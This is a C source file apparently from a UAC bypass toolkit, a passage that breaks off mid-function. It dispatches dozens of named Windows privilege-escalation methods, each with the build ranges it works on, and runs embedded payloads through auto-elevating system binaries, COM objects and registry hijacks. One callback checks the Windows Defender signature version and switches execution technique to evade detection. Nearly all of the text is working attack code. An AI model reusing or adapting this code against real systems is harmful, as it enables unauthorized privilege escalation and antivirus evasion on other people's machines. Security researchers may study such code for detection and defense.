/******************************************************************************* * * (C) COPYRIGHT AUTHORS, 2015 - 2020 * * TITLE: METHODS.C * * VERSION: 3.23 * * DATE: 17 Dec 2019 * * UAC bypass dispatch. * * THIS CODE AND INFORMATION IS PROVIDED "AS IS" WITHOUT WARRANTY OF * ANY KIND, EITHER EXPRESSED OR IMPLIED, INCLUDING BUT NOT LIMITED * TO THE IMPLIED WARRANTIES OF MERCHANTABILITY AND/OR FITNESS FOR A * PARTICULAR PURPOSE. * *******************************************************************************/ #include "global.h" UCM_API(MethodTest); UCM_API(MethodSysprep); UCM_API(MethodACRedirectEXE); UCM_API(MethodACBinaryPath); UCM_API(MethodSimda); UCM_API(MethodCarberp); UCM_API(MethodAVrf); UCM_API(MethodWinsat); UCM_API(MethodMMC); UCM_API(MethodMMC2); UCM_API(MethodSirefef); UCM_API(MethodGeneric); UCM_API(MethodGWX); UCM_API(MethodSysprep4); UCM_API(MethodManifest); UCM_API(MethodInetMg); UCM_API(MethodSXS); UCM_API(MethodDism); UCM_API(MethodComet); UCM_API(MethodEnigma0x3); UCM_API(MethodEnigma0x3_2); UCM_API(MethodExpLife); UCM_API(MethodSandworm); UCM_API(MethodEnigma0x3_3); UCM_API(MethodWow64Logger); UCM_API(MethodEnigma0x3_4); UCM_API(MethodUiAccess); UCM_API(MethodMsSettings); UCM_API(MethodTyranid); UCM_API(MethodTokenMod); UCM_API(MethodJunction); UCM_API(MethodSXSDccw); UCM_API(MethodHakril); UCM_API(MethodCorProfiler); UCM_API(MethodCOMHandlers); UCM_API(MethodCMLuaUtil); UCM_API(MethodFwCplLua); UCM_API(MethodDccwCOM); UCM_API(MethodVolatileEnv); UCM_API(MethodSluiHijack); UCM_API(MethodBitlockerRC); UCM_API(MethodCOMHandlers2); UCM_API(MethodSPPLUAObject); UCM_API(MethodCreateNewLink); UCM_API(MethodDateTimeStateWriter); UCM_API(MethodAcCplAdmin); UCM_API(MethodDirectoryMock); UCM_API(MethodShellSdctl); UCM_API(MethodEgre55); UCM_API(MethodTokenModUIAccess); UCM_API(MethodShellWSReset); UCM_API(MethodEditionUpgradeManager); UCM_API(MethodDebugObject); UCM_EXTRA_CONTEXT WDCallbackType1; #define UCM_WIN32_NOT_IMPLEMENTED_COUNT 5 ULONG UCM_WIN32_NOT_IMPLEMENTED[UCM_WIN32_NOT_IMPLEMENTED_COUNT] = { UacMethodMMC1, UacMethodInetMgr, UacMethodWow64Logger, UacMethodDateTimeWriter, UacMethodEditionUpgradeMgr }; UCM_API_DISPATCH_ENTRY ucmMethodsDispatchTable[UCM_DISPATCH_ENTRY_MAX] = { { MethodTest, NULL, { 7600, MAXDWORD }, FUBUKI_ID, FALSE, TRUE, TRUE }, { MethodSysprep, NULL, { 7600, 9600 }, FUBUKI_ID, FALSE, TRUE, TRUE }, { MethodSysprep, NULL, { 9600, 10240 }, FUBUKI_ID, FALSE, TRUE, TRUE }, { MethodSysprep, NULL, { 7600, 10548 }, FUBUKI_ID, FALSE, TRUE, TRUE }, { MethodACRedirectEXE, NULL, { 7600, 10240 }, PAYLOAD_ID_NONE, FALSE, FALSE, FALSE }, { MethodSimda, NULL, { 7600, 10136 }, PAYLOAD_ID_NONE, FALSE, TRUE, FALSE }, { MethodCarberp, NULL, { 7600, 10147 }, FUBUKI_ID, FALSE, FALSE, TRUE }, { MethodCarberp, NULL, { 7600, 10147 }, FUBUKI_ID, FALSE, TRUE, TRUE }, { MethodSysprep, NULL, { 7600, 9600 }, FUBUKI_ID, FALSE, TRUE, TRUE }, { MethodAVrf, NULL, { 7600, 10136 }, HIBIKI_ID, FALSE, TRUE, TRUE }, { MethodWinsat, NULL, { 7600, 10548 }, FUBUKI_ID, FALSE, TRUE, TRUE }, { MethodACBinaryPath, NULL, { 7600, 10240 }, FUBUKI_ID, TRUE, FALSE, TRUE }, { MethodSysprep, NULL, { 10240, 10586 }, FUBUKI_ID, FALSE, TRUE, TRUE }, { MethodMMC, NULL, { 7600, 14316 }, FUBUKI_ID, FALSE, TRUE, TRUE }, { MethodSirefef, NULL, { 7600, 10548 }, FUBUKI_ID, FALSE, TRUE, TRUE }, { MethodGeneric, NULL, { 7600, 14316 }, FUBUKI_ID, FALSE, TRUE, TRUE }, { MethodGWX, NULL, { 7600, 14316 }, FUBUKI_ID, FALSE, TRUE, TRUE }, { MethodSysprep4, NULL, { 9600, 14367 }, FUBUKI_ID, FALSE, TRUE, TRUE }, { MethodManifest, NULL, { 7600, 14367 }, FUBUKI_ID, FALSE, TRUE, TRUE }, { MethodInetMg, NULL, { 7600, 14367 }, FUBUKI_ID, FALSE, TRUE, TRUE }, { MethodMMC2, NULL, { 7600, 16232 }, FUBUKI_ID, FALSE, TRUE, TRUE }, { MethodSXS, NULL, { 7600, 16232 }, FUBUKI_ID, FALSE, TRUE, TRUE }, { MethodSXS, NULL, { 7600, MAXDWORD }, IKAZUCHI_ID, FALSE, TRUE, TRUE }, { MethodDism, NULL, { 7600, MAXDWORD }, FUBUKI_ID, FALSE, TRUE, TRUE }, { MethodComet, NULL, { 7600, 15031 }, PAYLOAD_ID_NONE, FALSE, FALSE, FALSE }, { MethodEnigma0x3, NULL, { 7600, 15031 }, FUBUKI_ID, FALSE, TRUE, FALSE }, { MethodEnigma0x3_2, NULL, { 7600, 15031 }, FUBUKI_ID, FALSE, TRUE, TRUE }, { MethodExpLife, NULL, { 7600, 16199 }, PAYLOAD_ID_NONE, FALSE, TRUE, FALSE }, { MethodSandworm, NULL, { 7600, 9600 }, FUBUKI_ID, FALSE, TRUE, TRUE }, { MethodEnigma0x3_3, NULL, { 10240, 16215 }, PAYLOAD_ID_NONE, FALSE, TRUE, FALSE }, { MethodWow64Logger, NULL, { 7600, MAXDWORD }, AKATSUKI_ID, FALSE, TRUE, TRUE }, { MethodEnigma0x3_4, NULL, {10240, 17000 }, PAYLOAD_ID_NONE, FALSE, FALSE, FALSE }, { MethodUiAccess, NULL, { 7600, MAXDWORD }, FUBUKI_ID, FALSE, TRUE, TRUE }, { MethodMsSettings, NULL, { 10240, MAXDWORD }, PAYLOAD_ID_NONE, FALSE, FALSE, FALSE }, { MethodTyranid, NULL, { 9600, MAXDWORD }, PAYLOAD_ID_NONE, FALSE, FALSE, FALSE }, { MethodTokenMod, NULL, { 7600, 17686 }, PAYLOAD_ID_NONE, FALSE, FALSE, FALSE }, { MethodJunction, NULL, { 7600, MAXDWORD }, FUBUKI_ID, FALSE, TRUE, TRUE }, { MethodSXSDccw, NULL, { 7600, MAXDWORD }, FUBUKI_ID, FALSE, TRUE, TRUE }, { MethodHakril, NULL, { 7600, MAXDWORD }, FUBUKI_ID, FALSE, FALSE, TRUE }, { MethodCorProfiler, NULL, { 7600, MAXDWORD }, FUBUKI_ID, FALSE, TRUE, TRUE }, { MethodCOMHandlers, NULL, { 7600, 18362 }, FUBUKI_ID, FALSE, TRUE, TRUE }, { MethodCMLuaUtil, NULL, { 7600, MAXDWORD }, PAYLOAD_ID_NONE, FALSE, TRUE, FALSE }, { MethodFwCplLua, &WDCallbackType1, { 7600, 17134 }, PAYLOAD_ID_NONE, FALSE, TRUE, FALSE }, { MethodDccwCOM, NULL, { 7600, MAXDWORD }, PAYLOAD_ID_NONE, FALSE, TRUE, FALSE }, { MethodVolatileEnv, NULL, { 7600, 16229 }, FUBUKI_ID, FALSE, TRUE, TRUE }, { MethodSluiHijack, &WDCallbackType1, { 9600, MAXDWORD }, PAYLOAD_ID_NONE, FALSE, FALSE, FALSE }, { MethodBitlockerRC, NULL, { 7600, 16300 }, PAYLOAD_ID_NONE, FALSE, FALSE, FALSE }, { MethodCOMHandlers2, &WDCallbackType1, { 7600, 18362 }, FUJINAMI_ID, FALSE, TRUE, TRUE }, { MethodSPPLUAObject, NULL, { 7600, 17763 }, FUBUKI_ID, FALSE, TRUE, TRUE }, { MethodCreateNewLink, NULL, { 7600, 14393 }, FUBUKI_ID, FALSE, FALSE, TRUE }, { MethodDateTimeStateWriter, NULL, { 7600, 17763 }, CHIYODA_ID, FALSE, TRUE, TRUE }, { MethodAcCplAdmin, NULL, { 7600, 17134 }, PAYLOAD_ID_NONE, FALSE, TRUE, FALSE }, { MethodDirectoryMock, NULL, { 7600, MAXDWORD }, FUBUKI_ID, FALSE, TRUE, TRUE }, { MethodShellSdctl, &WDCallbackType1, { 14393, MAXDWORD }, PAYLOAD_ID_NONE, FALSE, FALSE, FALSE }, { MethodEgre55, NULL, { 14393, 18362 }, FUBUKI_ID, TRUE, FALSE, TRUE }, { MethodTokenModUIAccess, NULL, { 7600, MAXDWORD }, FUBUKI_ID, FALSE, TRUE, FALSE }, { MethodShellWSReset, &WDCallbackType1, { 17134, MAXDWORD }, PAYLOAD_ID_NONE, FALSE, FALSE, FALSE }, { MethodSysprep, NULL, { 7600, 9600 }, FUBUKI_ID, FALSE, TRUE, TRUE }, { MethodEditionUpgradeManager, NULL, { 14393, MAXDWORD }, FUBUKI_ID, FALSE, TRUE, TRUE }, { MethodDebugObject, NULL, { 7600, MAXDWORD }, PAYLOAD_ID_NONE, FALSE, FALSE, FALSE } }; #define WDCallbackTypeMagicVer1 282647531814912 #define WDCallbackTypeMagicVer2 282733539622912 /* * SetMethodExecutionType * * Purpose: * * ExtraContext callback. * */ NTSTATUS CALLBACK SetMethodExecutionType( _In_ PVOID Parameter ) { #ifdef _DEBUG WCHAR szBuffer[100]; #endif UCM_METHOD Method = (UCM_METHOD)PtrToUlong(Parameter); MPCOMPONENT_VERSION SignatureVersion; if (g_ctx->hMpClient == NULL) return STATUS_DLL_NOT_FOUND; if (wdIsEnabled() != STATUS_TOO_MANY_SECRETS) return STATUS_NOT_FOUND; RtlSecureZeroMemory(&SignatureVersion, sizeof(SignatureVersion)); if (wdGetAVSignatureVersion(&SignatureVersion)) { #ifdef _DEBUG szBuffer[0] = 0; u64tostr(SignatureVersion.Version, &szBuffer[0]); OutputDebugString(szBuffer); #endif // // In fact it doesn't matter as their detection based on totally // fucked up behavior rules which observation produced mixed results. // We keep this as it doesn't affect program work. // switch (Method) { case UacMethodSluiHijack: if (SignatureVersion.Version >= WDCallbackTypeMagicVer1) { g_ctx->MethodExecuteType = ucmExTypeRegSymlink; } else { g_ctx->MethodExecuteType = ucmExTypeDefault; } break; case UacMethodFwCplLua: if (SignatureVersion.Version >= WDCallbackTypeMagicVer1) { g_ctx->MethodExecuteType = ucmExTypeIndirectModification; } else { g_ctx->MethodExecuteType = ucmExTypeDefault; } break; case UacMethodCOMHandlers2: case UacMethodShellSdclt: case UacMethodShellWSReset: if (SignatureVersion.Version >= WDCallbackTypeMagicVer2) { g_ctx->MethodExecuteType = ucmExTypeIndirectModification; } else { g_ctx->MethodExecuteType = ucmExTypeDefault; } break; default: break; } } return STATUS_SUCCESS; } /* * IsMethodImplementedForWin32 * * Purpose: * * Check if method implemented in win32 version. * */ __forceinline BOOL IsMethodImplementedForWin32( _In_ UCM_METHOD Method) { UINT i; for (i = 0; i < UCM_WIN32_NOT_IMPLEMENTED_COUNT; i++) if (UCM_WIN32_NOT_IMPLEMENTED[i] == (ULONG)Method) return FALSE; return TRUE; } /* * IsMethodMatchRequirements * * Purpose: * * Check system requirements of the given method. * */ NTSTATUS IsMethodMatchRequirements( _In_ PUCM_API_DISPATCH_ENTRY Entry ) { #ifdef _DEBUG UNREFERENCED_PARAMETER(Entry); #else WCHAR szMessage[MAX_PATH]; // // Check Wow64 flags first. Disable this check for debugging build. // if (g_ctx->IsWow64) { if (Entry->DisallowWow64) { ucmShowMessage(g_ctx->OutputToDebugger, WOW64STRING); return STATUS_NOT_SUPPORTED; } } #ifdef _WIN64 else { // // Not required if Win32. // if (Entry->Win32OrWow64Required != FALSE) { ucmShowMessage(g_ctx->OutputToDebugger, WOW64WIN32ONLY); return STATUS_NOT_SUPPORTED; } } #endif //_WIN64 // // Check availability. Disable this check for debugging build. // if (g_ctx->dwBuildNumber < Entry->Availability.MinumumWindowsBuildRequired) { RtlSecureZeroMemory(&szMessage, sizeof(szMessage)); _strcpy(szMessage, L"Current Windows Build: "); ultostr(g_ctx->dwBuildNumber, _strend(szMessage)); _strcat(szMessage, L"\nMinimum Windows Build Required: "); ultostr(Entry->Availability.MinumumWindowsBuildRequired, _strend(szMessage)); _strcat(szMessage, L"\nAborting execution."); ucmShowMessage(g_ctx->OutputToDebugger, szMessage); return STATUS_NOT_SUPPORTED; } if (g_ctx->dwBuildNumber >= Entry->Availability.MinimumExpectedFixedWindowsBuild) { if (ucmShowQuestion(UACFIX) == IDNO) { return STATUS_NOT_SUPPORTED; } } #endif return STATUS_SUCCESS; } /* * SetupExtraContextCalbacks * * Purpose: * * Configure extra context callbacks. * */ VOID SetupExtraContextCalbacks( _In_ UCM_METHOD Method, _In_ PUCM_EXTRA_CONTEXT Context ) { switch (Method) { case UacMethodSluiHijack: case UacMethodFwCplLua: case UacMethodCOMHandlers2: case UacMethodShellSdclt: case UacMethodShellWSReset: Context->Parameter = ULongToPtr(Method); Context->Routine = SetMethodExecutionType; break; default: Context->Parameter = NULL; Context->Routine = NULL; break; } } /* * PostCleanupAttempt * * Purpose: * * Attempt to cleanup left overs. * */ VOID PostCleanupAttempt( _In_ UCM_METHOD Method ) { switch (Method) { case UacMethodSysprep1: case UacMethodSysprep2: case UacMethodSysprep3: case UacMethodSysprep4: case UacMethodSysprep5: case UacMethodTilon: ucmSysprepMethodsCleanup(Method); break; case UacMethodOobe: ucmOobeMethodCleanup(); break; case UacMethodAVrf: ucmMethodCleanupSingleItemSystem32(HIBIKI_DLL); break; case UacMethodDISM: ucmMethodCleanupSingleItemSystem32(DISMCORE_DLL); break; case UacMethodWow64Logger: ucmMethodCleanupSingleItemSystem32(WOW64LOG_DLL); break; case UacMethodGeneric: ucmMethodCleanupSingleItemSystem32(NTWDBLIB_DLL); break; case UacMethodJunction: ucmJunctionMethodCleanup(); break; case UacMethodSirefef: ucmSirefefMethodCleanup(); break; case UacMethodMMC1: case UacMethodMMC2: ucmMMCMethodCleanup(Method); break; case UacMethodSXS: ucmSXSMethodCleanup(FALSE); break; case UacMethodSXSConsent: ucmSXSMethodCleanup(TRUE); break; case UacMethodSXSDccw: ucmSXSDccwMethodCleanup(); break; case UacMethodHakril: ucmHakrilMethodCleanup(); break; case UacMethodCreateNewLink: ucmCreateNewLinkMethodCleanup(); break; case UacMethodEditionUpgradeMgr: ucmEditionUpgradeManagerMethodCleanup(); break; default: break; } } /* * MethodsManagerCall * * Purpose: * * Run method by method id. * */ NTSTATUS MethodsManagerCall( _In_ UCM_METHOD Method ) { BOOL bParametersBlockSet = FALSE; NTSTATUS MethodResult, Status; ULONG PayloadSize = 0, DataSize = 0; PVOID PayloadCode = NULL, Resource = NULL; PVOID ImageBaseAddress = g_hInstance; PUCM_API_DISPATCH_ENTRY Entry; PUCM_EXTRA_CONTEXT ExtraContext; UCM_PARAMS_BLOCK ParamsBlock; LARGE_INTEGER liDueTime; if (Method >= UacMethodMax) return STATUS_INVALID_PARAMETER; // // Is method implemented for Win32? // #ifndef _WIN64 if (!IsMethodImplementedForWin32(Method)) { return STATUS_NOT_SUPPORTED; } #endif //_WIN64 Entry = &ucmMethodsDispatchTable[Method]; Status = IsMethodMatchRequirements(Entry); if (!NT_SUCCESS(Status)) return Status; if (Entry->PayloadResourceId != PAYLOAD_ID_NONE) { Resource = supLdrQueryResourceData( Entry->PayloadResourceId, ImageBaseAddress, &DataSize); if (Resource) { PayloadCode = g_ctx->DecompressRoutine(Entry->PayloadResourceId, Resource, DataSize, &PayloadSize); } if ((PayloadCode == NULL) || (PayloadSize == 0)) { return STATUS_DATA_ERROR; } } ExtraContext = Entry->ExtraContext; if (ExtraContext) { SetupExtraContextCalbacks(Method, ExtraContext); if (ExtraContext->Routine) ExtraContext->Routine(ExtraContext->Parameter); } ParamsBlock.Method = Method; ParamsBlock.PayloadCode = PayloadCode; ParamsBlock.PayloadSize = PayloadSize; // // Set shared parameters. // // 1. Execution parameters (flag, session id, winstation\desktop) // 2. Optional parameter from Akagi command line. // if (Entry->SetParameters) { bParametersBlockSet = supCreateSharedParametersBlock(g_ctx); } MethodResult = Entry->Routine(&ParamsBlock); if (PayloadCode) { RtlSecureZeroMemory(PayloadCode, PayloadSize); supVirtualFree(PayloadCode, NULL); } // // Wait a little bit for completion. // if (Entry->SetParameters) { if (bParametersBlockSet) { if (g_ctx->SharedContext.hCompletionEvent) { liDueTime.QuadPart = -(LONGLONG)UInt32x32To64(200000, 10000); NtWaitForSingleObject(g_ctx->SharedContext.hCompletionEvent, FALSE, &liDueTime); } supDestroySharedParametersBlock(g_ctx); } } PostCleanupAttempt(Method); return MethodResult; } /************************************************************ ** ** ** ** Method table wrappers ** ** ** ************************************************************/ UCM_API(MethodTest) { #ifdef _DEBUG return ucmTestRoutine(Parameter->PayloadCode, Parameter->PayloadSize); #else UNREFERENCED_PARAMETER(Parameter); return TRUE; #endif } UCM_API(MethodSysprep) { return ucmStandardAutoElevation( Parameter->Method, Parameter->PayloadCode, Parameter->PayloadSize); } UCM_API(MethodACRedirectEXE) { LPWSTR lpszPayload; UNREFERENCED_PARAMETER(Parameter); if (g_ctx->OptionalParameterLength != 0) lpszPayload = g_ctx->szOptionalParameter; else lpszPayload = g_ctx->szDefaultPayload; return ucmShimRedirectEXE(lpszPayload); } UCM_API(MethodACBinaryPath) { #ifdef _WIN64 UNREFERENCED_PARAMETER(Parameter); return STATUS_NOT_SUPPORTED; #else return ucmShimPatch( Parameter->PayloadCode, Parameter->PayloadSize); #endif } UCM_API(MethodSimda) { UNREFERENCED_PARAMETER(Parameter); // // Make sure user understand aftereffects. // if (ucmShowQuestion(T_SIMDA_CONSENT_WARNING) == IDYES) { return ucmSimdaTurnOffUac(); } return STATUS_CANCELLED; } UCM_API(MethodCarberp) { // // Additional checking for UacMethodCarberp1. // Target application 'migwiz' unavailable in Syswow64 after Windows 7. // if (Parameter->Method == UacMethodCarberp1) { if ((g_ctx->IsWow64) && (g_ctx->dwBuildNumber > 7601)) { ucmShowMessage(g_ctx->OutputToDebugger, WOW64STRING); return STATUS_UNKNOWN_REVISION; } } return ucmWusaMethod( Parameter->Method, Parameter->PayloadCode, Parameter->PayloadSize); } UCM_API(MethodAVrf) { return ucmAvrfMethod( Parameter->PayloadCode, Parameter->PayloadSize); } UCM_API(MethodWinsat) { BOOL UseWusa = FALSE; LPWSTR lpFileName; // // Additional checking. // Switch used filename because of \KnownDlls changes. // if (g_ctx->dwBuildNumber < 9200) { lpFileName = POWRPROF_DLL; } else { lpFileName = DEVOBJ_DLL; } // // Use Wusa where available. // UseWusa = (g_ctx->dwBuildNumber <= 10136); return ucmWinSATMethod( lpFileName, Parameter->PayloadCode, Parameter->PayloadSize, UseWusa); } UCM_API(MethodMMC) { // // Required dll dependency not exist in x86-32 // #ifdef _WIN64 return ucmMMCMethod( Parameter->Method, ELSEXT_DLL, Parameter->PayloadCode, Parameter->PayloadSize); #else UNREFERENCED_PARAMETER(Parameter); return STATUS_NOT_SUPPORTED; #endif } UCM_API(MethodMMC2) { return ucmMMCMethod( Parameter->Method, WBEMCOMN_DLL, Parameter->PayloadCode, Parameter->PayloadSize); } UCM_API(MethodSirefef) { return ucmSirefefMethod( Parameter->PayloadCode, Parameter->PayloadSize); } UCM_API(MethodGeneric) { WCHAR szBuffer[MAX_PATH * 2]; RtlSecureZeroMemory(szBuffer, sizeof(szBuffer)); _strcpy(szBuffer, g_ctx->szSystemDirectory); _strcat(szBuffer, CLICONFG_EXE); return ucmGenericAutoelevation( szBuffer, NTWDBLIB_DLL, Parameter->PayloadCode, Parameter->PayloadSize); } UCM_API(MethodGWX) { return ucmGWX( Parameter->PayloadCode, Parameter->PayloadSize); } UCM_API(MethodSysprep4) { return ucmStandardAutoElevation2( Parameter->PayloadCode, Parameter->PayloadSize); } UCM_API(MethodManifest) { return ucmAutoElevateManifest( Parameter->PayloadCode, Parameter->PayloadSize); } UCM_API(MethodInetMg) { #ifdef _WIN64 return ucmInetMgrMethod( Parameter->PayloadCode, Parameter->PayloadSize); #else UNREFERENCED_PARAMETER(Parameter); return STATUS_NOT_SUPPORTED; #endif } UCM_API(MethodSXS) { BOOL bConsentItself = FALSE; LPWSTR lpTargetDirectory = NULL; LPWSTR lpTargetApplication = NULL; LPWSTR lpLaunchApplication = NULL; // // Select parameters depending on method used. // if (Parameter->Method == UacMethodSXS) { bConsentItself = FALSE; lpTargetDirectory = SYSPREP_DIR; lpTargetApplication = SYSPREP_EXE; lpLaunchApplication = NULL; } else { if (Parameter->Method == UacMethodSXSConsent) { // // Make sure user understand aftereffects. // #ifndef _DEBUG if (ucmShowQuestion(T_SXS_CONSENT_WARNING) != IDYES) { return STATUS_CANCELLED; } #endif //_DEBUG bConsentItself = TRUE; lpTargetDirectory = NULL; lpTargetApplication = CONSENT_EXE; lpLaunchApplication = EVENTVWR_EXE; } } if (lpTargetApplication == NULL) { return STATUS_INVALID_PARAMETER; } return ucmSXSMethod( Parameter->PayloadCode, Parameter->PayloadSize, lpTargetDirectory, lpTargetApplication, lpLaunchApplication, bConsentItself); } UCM_API(MethodDism) { return ucmDismMethod( Parameter->PayloadCode, Parameter->PayloadSize); } UCM_API(MethodComet) { LPWSTR lpszPayload = NULL; UNREFERENCED_PARAMETER(Parameter); // // Select payload, if none default will be executed. // if (g_ctx->OptionalParameterLength != 0) lpszPayload = g_ctx->szOptionalParameter; else lpszPayload = g_ctx->szDefaultPayload; return ucmCometMethod(lpszPayload); } UCM_API(MethodEnigma0x3) { LPWSTR lpszTargetApp = NULL; LPWSTR lpszPayload = NULL; // // Select target application. // if (g_ctx->dwBuildNumber >= 15007) lpszTargetApp = COMPMGMTLAUNCHER_EXE; else lpszTargetApp = EVENTVWR_EXE; // // Select payload, if none default will be executed. // if (g_ctx->OptionalParameterLength != 0) lpszPayload = g_ctx->szOptionalParameter; else lpszPayload = NULL; return ucmHijackShellCommandMethod( lpszPayload, lpszTargetApp, Parameter->PayloadCode, Parameter->PayloadSize); } UCM_API(MethodEnigma0x3_2) { return ucmDiskCleanupRaceCondition( Parameter->PayloadCode, Parameter->PayloadSize); } UCM_API(MethodExpLife) { LPWSTR lpszParameter; UNREFERENCED_PARAMETER(Parameter); // // Select target application or use given by optional parameter. // if (g_ctx->OptionalParameterLength == 0) lpszParameter = g_ctx->szDefaultPayload; else lpszParameter = g_ctx->szOptionalParameter; return ucmUninstallLauncherMethod(lpszParameter); } UCM_API(MethodSandworm) { return ucmSandwormMethod( Parameter->PayloadCode, Parameter->PayloadSize); } UCM_API(MethodEnigma0x3_3) { LPWSTR lpszPayload = NULL; UNREFERENCED_PARAMETER(Parameter); // // Select target application or use given by optional parameter. // if (g_ctx->OptionalParameterLength == 0) lpszPayload = g_ctx->szDefaultPayload; else lpszPayload = g_ctx->szOptionalParameter; return ucmAppPathMethod( lpszPayload, CONTROL_EXE, SDCLT_EXE); } UCM_API(MethodWow64Logger) { // // Required x64 as this method abuse wow64 logger mechanism // #ifdef _WIN64 return ucmWow64LoggerMethod( Parameter->PayloadCode, Parameter->PayloadSize); #else UNREFERENCED_PARAMETER(Parameter); return STATUS_NOT_SUPPORTED; #endif } UCM_API(MethodEnigma0x3_4) { LPWSTR lpszPayload = NULL; UNREFERENCED_PARAMETER(Parameter); if (g_ctx->OptionalParameterLength == 0) lpszPayload = g_ctx->szDefaultPayload; else lpszPayload = g_ctx->szOptionalParameter; return ucmSdcltIsolatedCommandMethod(lpszPayload); } UCM_API(MethodUiAccess) { return ucmUiAccessMethod( Parameter->PayloadCode, Parameter->PayloadSize); } UCM_API(MethodMsSettings) { LPWSTR lpszPayload = NULL; UNREFERENCED_PARAMETER(Parameter); if (g_ctx->OptionalParameterLength == 0) lpszPayload = g_ctx->szDefaultPayload; else lpszPayload = g_ctx->szOptionalParameter; return ucmMsSettingsDelegateExecuteMethod(lpszPayload); } UCM_API(MethodTyranid) { LPWSTR lpszPayload = NULL; UNREFERENCED_PARAMETER(Parameter); // // Select target application or use given by optional parameter. // if (g_ctx->OptionalParameterLength == 0) lpszPayload = g_ctx->szDefaultPayload; else lpszPayload = g_ctx->szOptionalParameter; return ucmDiskCleanupEnvironmentVariable(lpszPayload); } UCM_API(MethodTokenMod) { LPWSTR lpszPayload = NULL; BOOL fUseCommandLine; UNREFERENCED_PARAMETER(Parameter); // // Select target application or use given by optional parameter. // if (g_ctx->OptionalParameterLength == 0) { lpszPayload = g_ctx->szDefaultPayload; fUseCommandLine = FALSE; } else { lpszPayload = g_ctx->szOptionalParameter; fUseCommandLine = TRUE; } return ucmTokenModification( lpszPayload, fUseCommandLine); } UCM_API(MethodJunction) { return ucmJunctionMethod( Parameter->PayloadCode, Parameter->PayloadSize); } UCM_API(MethodSXSDccw) { return ucmSXSDccwMethod( Parameter->PayloadCode, Parameter->PayloadSize); } UCM_API(MethodHakril) { return ucmHakrilMethod( Parameter->PayloadCode, Parameter->PayloadSize); } UCM_API(MethodCorProfiler) { return ucmCorProfilerMethod( Parameter->PayloadCode, Parameter->PayloadSize); } UCM_API(MethodCOMHandlers) { return ucmCOMHandlersMethod( Parameter->PayloadCode, Parameter->PayloadSize); } UCM_API(MethodCMLuaUtil) { LPWSTR lpszParameter; UNREFERENCED_PARAMETER(Parameter); // // Select target application or use given by optional parameter. // if (g_ctx->OptionalParameterLength == 0) lpszParameter = g_ctx->szDefaultPayload; else lpszParameter = g_ctx->szOptionalParameter; return ucmCMLuaUtilShellExecMethod(lpszParameter); } UCM_API(MethodFwCplLua) { LPWSTR lpszPayload = NULL; UNREFERENCED_PARAMETER(Parameter); // // Select target application or use given by optional parameter. // if (g_ctx->OptionalParameterLength == 0) lpszPayload = g_ctx->szDefaultPayload; else lpszPayload = g_ctx->szOptionalParameter; return ucmFwCplLuaMethod(lpszPayload); } UCM_API(MethodDccwCOM) { LPWSTR lpszPayload = NULL; UNREFERENCED_PARAMETER(Parameter); // // Select target application or use given by optional parameter. // if (g_ctx->OptionalParameterLength == 0) lpszPayload = g_ctx->szDefaultPayload; else lpszPayload = g_ctx->szOptionalParameter; return ucmDccwCOMMethod(lpszPayload); } UCM_API(MethodVolatileEnv) { return ucmVolatileEnvMethod( Parameter->PayloadCode, Parameter->PayloadSize); } UCM_API(MethodSluiHijack) { LPWSTR lpszPayload = NULL; UNREFERENCED_PARAMETER(Parameter); // // Select target application or use given by optional parameter. // if (g_ctx->OptionalParameterLength == 0) lpszPayload = g_ctx->szDefaultPayload; else lpszPayload = g_ctx->szOptionalParameter; return ucmSluiHijackMethod(lpszPayload); } UCM_API(MethodBitlockerRC) { LPWSTR lpszPayload = NULL; UNREFERENCED_PARAMETER(Parameter); // // Select target application or use given by optional parameter. // if (g_ctx->OptionalParameterLength == 0) lpszPayload = g_ctx->szDefaultPayload; else lpszPayload = g_ctx->szOptionalParameter; return ucmBitlockerRCMethod(lpszPayload); } UCM_API(MethodCOMHandlers2) { return ucmCOMHandlersMethod2( Parameter->PayloadCode, Parameter->PayloadSize); } UCM_API(MethodSPPLUAObject) { return ucmSPPLUAObjectMethod( Parameter->PayloadCode, Parameter->PayloadSize); } UCM_API(MethodCreateNewLink) { return ucmCreateNewLinkMethod( Parameter->PayloadCode, Parameter->PayloadSize); } UCM_API(MethodDateTimeStateWriter) { #ifndef _WIN64 UNREFERENCED_PARAMETER(Parameter); return STATUS_NOT_SUPPORTED; #else return ucmDateTimeStateWriterMethod( Parameter->PayloadCode, Parameter->PayloadSize); #endif } UCM_API(MethodAcCplAdmin) { LPWSTR lpszPayload = NULL; UNREFERENCED_PARAMETER(Parameter); // // Select target application or use given by optional parameter. // if (g_ctx->OptionalParameterLength == 0) lpszPayload = g_ctx->szDefaultPayload; else lpszPayload = g_ctx->szOptionalParameter; return ucmAcCplAdminMethod(lpszPayload); } UCM_API(MethodDirectoryMock) { return ucmDirectoryMockMethod( Parameter->PayloadCode, Parameter->PayloadSize); } UCM_API(MethodShellSdctl) { LPWSTR Payload = NULL; UNREFERENCED_PARAMETER(Parameter); if (g_ctx->OptionalParameterLength == 0) Payload = g_ctx->szDefaultPayload; else Payload = g_ctx->szOptionalParameter; return ucmShellDelegateExecuteCommandMethod( SDCLT_EXE, _strlen(SDCLT_EXE), T_CLASSESFOLDER, _strlen(T_CLASSESFOLDER), Payload, _strlen(Payload)); } UCM_API(MethodEgre55) { #ifdef _WIN64 UNREFERENCED_PARAMETER(Parameter); return STATUS_NOT_SUPPORTED; #else return ucmEgre55Method( Parameter->PayloadCode, Parameter->PayloadSize); #endif } UCM_API(MethodTokenModUIAccess) { return ucmTokenModUIAccessMethod(Parameter->PayloadCode, Parameter->PayloadSize); } UCM_API(MethodShellWSReset) { ULONG Result = 0; LPWSTR PayloadParameter = NULL, PayloadFinal = NULL; SIZE_T Size; UNREFERENCED_PARAMETER(Parameter); if (g_ctx->OptionalParameterLength == 0) PayloadParameter = g_ctx->szDefaultPayload; else PayloadParameter = g_ctx->szOptionalParameter; Size = ((MAX_PATH * 2) + _strlen(PayloadParameter)) * sizeof(WCHAR); PayloadFinal = supHeapAlloc(Size); if (PayloadFinal) { _strcpy(PayloadFinal, g_ctx->szSystemDirectory); _strcat(PayloadFinal, CMD_EXE); _strcat(PayloadFinal, TEXT(" /c start ")); _strcat(PayloadFinal, PayloadParameter); Result = ucmShellDelegateExecuteCommandMethod( WSRESET_EXE, _strlen(WSRESET_EXE), T_APPXPACKAGE, _strlen(T_APPXPACKAGE), PayloadFinal, _strlen(PayloadFinal)); supHeapFree(PayloadFinal); } return Result; } UCM_API(MethodEditionUpgradeManager) { #ifndef _WIN64 UNREFERENCED_PARAMETER(Parameter); return STATUS_NOT_SUPPORTED; #else return ucmEditionUpgradeManagerMethod( Parameter->PayloadCode, Parameter->PayloadSize); 